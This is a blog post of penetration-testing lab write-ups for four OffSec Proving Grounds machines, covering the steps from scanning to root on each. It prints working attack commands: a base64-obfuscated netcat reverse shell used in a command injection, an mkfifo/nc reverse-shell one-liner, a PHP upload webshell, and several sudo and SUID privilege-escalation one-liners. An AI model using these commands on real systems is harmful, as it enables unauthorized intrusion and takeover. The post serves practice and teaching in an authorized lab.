Post

OffSec PG - NoName, SoSimple, OnSystemShellDread, Photographer

Posted
PG Artwork
PG Artwork
By Tanishq Rupaal
7 min read

NoName

Enumeration

Machine IP → 192.168.225.15

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.225.15

OS Detection → os_info

PortServiceOther details (if any)
80HTTPApache httpd 2.4.29 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.225.15 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/raft-small-words.txt -x html,php,txt

Directories/files listed →

  • index.php
  • icons/
  • superadmin.php

Exploitation

Looking at superadmin.php, it seems like a ping command and thus may be vulnerable to command injection. Using ; didn’t work, neither did &&. | did work and using it to print the code of the file like 127.0.0.1 | cat superadmin.php shows that ";","&&","/","bin","&"," &&","ls","nc","dir","pwd" are all blocked.

Therefore, escaping the blocks by using

1

127.0.0.1 | `echo bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDkuMjI1IDMwMDIK | base64 -d`

This gives a shell as the www-data user and thus the user flag.

Privilege Escalation

User

Looking at the /etc/passwd file, the users of importance are root, haclabs and yash. Used find / -type f -user yash 2>/dev/null to list files owned by yash and this prints a file /usr/share/hidden/.passwd. Looking at the permissions, it is world readable.

The contents of the file is a password haclabs1234. This works for the credentials haclabs:haclabs1234. This grants a shell as haclabs user. Looking at sudo -l, this user can run /usr/bin/find as root without any password. Thus, using the command sudo find . -exec /bin/bash \; -quit, a root shell can be gained. This gives the root flag.

SoSimple

Enumeration

Machine IP → 192.168.244.78

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.244.78

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

Table

PortServiceOther details (if any)
22SSHOpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.41 ((Ubuntu))

Web Scan

GoBuster scan → gobuster dir -u http://192.168.244.78 -f -w /home/tanq/installations/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • icons/ (403)
  • wordpress/
  • server-status/ (403)

Repeating a scan for the /wordpress/ subdirectory, the following were listed →

  • index.php (301)
  • wp-content/
  • wp-login.php
  • license.txt
  • wp-includes/
  • readme.html
  • wp-trackback.php
  • wp-admin (302, to wp-login.php)

WPScan was also run given the presence of the wordpress site. This revealed the following findings →

  • Plugin Social Warfare 3.5.0 (out of date)
  • Plugin Simple Cart Solution 0.2.0 (out of date)
  • Theme twentynineteen 1.6 (out of date)
  • Wordpress version 5.4.2
  • Enabled WP-Cron at /wordpress/wp-cron.php
  • Directory listing at /wordpress/wp-content/uploads/
  • XMLRPC enabled at /xmlrpc.php

Exploitation

RFI and RCE

With all the information above, the first searchsploit result is that of an RCE in Social Warfare versions < 3.5.3. Looking at the exploit, it needs a payload url to know the payload (an RFI). This will be included in /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=<RFI_URL>.

Reverse Shell

Visiting this page would give the result of the command in the payload url. The payload must be of the form → <pre>system('whoami')</pre>. Checking the existence of netcat and bash, a new payload can be used for a reverse shell → nc -e /bin/bash 192.168.49.244 3002. This didn’t work, therefore, used the usual bash payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.244 3002 >/tmp/f. This grants the shell as www-data user.

Privilege Escalation

User 1

Looking at /etc/passwd, the users of interest are root, max and steven. The home directory of both max and steven are readable by www-data. The user flag is in max’s home directory. The webroot also contains a base32 encoded string in a file mybackup.txtJEQGQYLWMUQHI3ZANNSWK4BAORUGS4ZAOBQXG43XN5ZGIIDTN5WWK53IMVZGKIDTMFTGK3DZEBRGKY3BOVZWKICJEBRWC3RHOQQHEZLNMVWWEZLSEBUXIORAN5YGK3TTMVZWC3LF.

This decodes to I have to keep this password somewhere safely because I can't remember it: opensesame. Therefore, this password is attempted on ssh for max and steven. However, this did not work.

The home directory of max also has a .ssh directory, which contains the private key of max. This is readable by www-data and is thus used to ssh into the server as max, which grants the shell and thus the user flag as well.

User 2

Checked the ability of max to run sudo using sudo -l. This allowed running /usr/sbin/service as steven without a password. The service command looks for services in a specific directory and launches them. It can therefore be tricked by prepending ../../../../ to whichever command needs to be executed. Therefore running →

1

sudo -u steven /usr/sbin/service ../../../../bin/bash

grants the shell as steven.

Root

Looked at the ability of steven to run sudo. This revealed that steven is allowed to run /opt/tools/server-health.sh as root without a password. The path does not exist, therefore, a new executable is created with the same name and the following content →

1
2

##!/bin/bash
bash -p

Then command sudo /opt/tools/server-health.sh is executed, which grants the shell as root and also the root flag.

OnSystemShellDread

Enumeration

Machine IP → 192.168.244.130

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.244.130

OS Detection → OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
21FTPvsftpd 3.0.3 → Anonymous login allowed
61000SSHOpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

Exploitation

Looking at the anonymous ftp, there was a directory .hannah inside which was an ssh key. Used this key for the user hannah on the ssh server grants the shell as hannah. This gave the user flag.

Privilege Escalation

Looked at the setuid binaries on the system, cpulimit was the interesting one. It can be ised to spawn a shell with elevated privileges using command → cpulimit -l 50 -f /bin/bash. However, with this, the program detects that the program being run has lower privileges, so bash drops the elevated privileges. Usually, bash has a flag -p, the purpose of which, as stated in the man page of bash is →

1
2
3

If  the  shell is started with the effective user (group) id not equal to the
real user (group) id, and the -p option is not supplied, the effective user id
is set to the real user id. Otherwise, the effective user id is not reset.

Therefore, a privileged shell can be launched as follows → cpulimit -l 100 -f -- /bin/sh -p. This gives the root shell and thus, the root flag.

Photographer

Enumeration

Machine IP → 192.168.59.76

Network Scan

Nmap scan → nmap -A -Pn -p- -T4 -o nmap.txt 192.168.59.76

OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel

PortServiceOther details (if any)
22SSHOpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80HTTPApache httpd 2.4.18 ((Ubuntu))
139NETBIOS-SSNSamba smbd 3.X - 4.X (workgroup: WORKGROUP)
445NETBIOS-SSNSamba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000HTTP-ALTApache/2.4.18 (Ubuntu)

Web Scan

GoBuster scan → /opt/GoBuster/gobuster dir -u http://192.168.59.76 -w /opt/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt

Directories/files listed →

  • index.html
  • generic.html
  • elements.html
  • images/
  • assets/

Scanning the web site on port 8000 with a -x html,php,txt and a -f flag gives the following →

  • app/
  • admin/
  • index/
  • set/

Running nmap to discover shares using nmap --script smb-enum-shares -p 139,445 192.168.59.76 provided with the shares of IPC, sambashare, and print. This also showed the capability to read and write using anonymous users and a possible username of agi.

Exploitation

Listing Samba shares using sambaclient -U '' //192.168.59.76/sambashare. This share had an email to user daisa and a backup of a wordpress site. The email contained a hint to a possible password for daisa, using that on the website at the /admin path for the website at port 8000 provided access with credentials daisa:babygirl.

Here, the Library segment contains a file upload functionality that is interesting. Image files can be uploaded and can be previewed in the application. Messing with this functionality to upload a PHP code by changing the Content-Type to application/php and the filename to include the .php extension with the data containing the following code →

1
2
3

<?php
echo("hacked");
?>

This file can be uploaded without any issue which means the server is vulnerable to arbitrary file upload. The preview for this php file doesn’t work of course, but the application shows a “Download File” option due to the failed preview. This button contains a link to the file at http://192.168.59.76:8000/storage/originals/50/ce/cyberpunk.php, upon visiting which the string “hacked” is displayed on the web page indicating that arbitrary php can be executed. Therefore, Pentest Monkey’s script can be used to obtain a reverse shell.

Using the script and then executing the PHP code at http://192.168.59.76:8000/storage/originals/ec/a3/cyberpunk-shell.php grants a shell with the user www-data.

Privilege Escalation

Looking at the SUID binaries using find / -perm -4000 2>/dev/null there is an SUID binary for php7.2 which does have a root shell escalation associated with it. Using php7.2 -r "pcntl_exec('/bin/sh', ['-p']);" to launch a shell with effective uid as root, the root flag and the local flag can be read. A new user with full sudo permissions can also be added by modifying the /etc/passwd and /etc/sudoers files.

Lab Practice Notes, OffSec Proving Grounds
oscp lab offsec-proving-grounds
This post is licensed under CC BY 4.0 by the author.